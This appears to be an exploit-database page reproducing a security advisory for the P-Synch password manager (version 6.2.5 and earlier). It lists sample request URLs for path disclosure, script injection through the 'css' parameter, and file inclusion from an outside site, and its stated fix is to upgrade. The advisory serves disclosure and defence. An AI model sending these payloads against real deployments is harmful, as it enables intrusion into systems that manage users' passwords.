header-logo
Suggest Exploit
vendor:
P-Synch
by:
James Bercegay
N/A
CVSS
N/A
Multiple
CWE
Product Name: P-Synch
Affected Version From: <= 6.2.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

P-Synch Multiple Vulnerabilities

P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.

Mitigation:

Upgrade to the latest version of P-Synch Password Managment.
Source

Exploit-DB raw data:

P-Synch Multiple Vulnerabilities

Vendor: M-Tech Identity Management Solutions
Product: P-Synch
Version: <= 6.2.5
Website: http://www.psynch.com/

BID: 7740 7745 7747 

Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications. 

Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang= 

Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] 

File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file 

Solution:
Upgrade to the latest version of P-Synch Password Managment. 

Credits:
James Bercegay of the GulfTech Security Research Team.

Navigation

Suggest Exploit

Services By CQR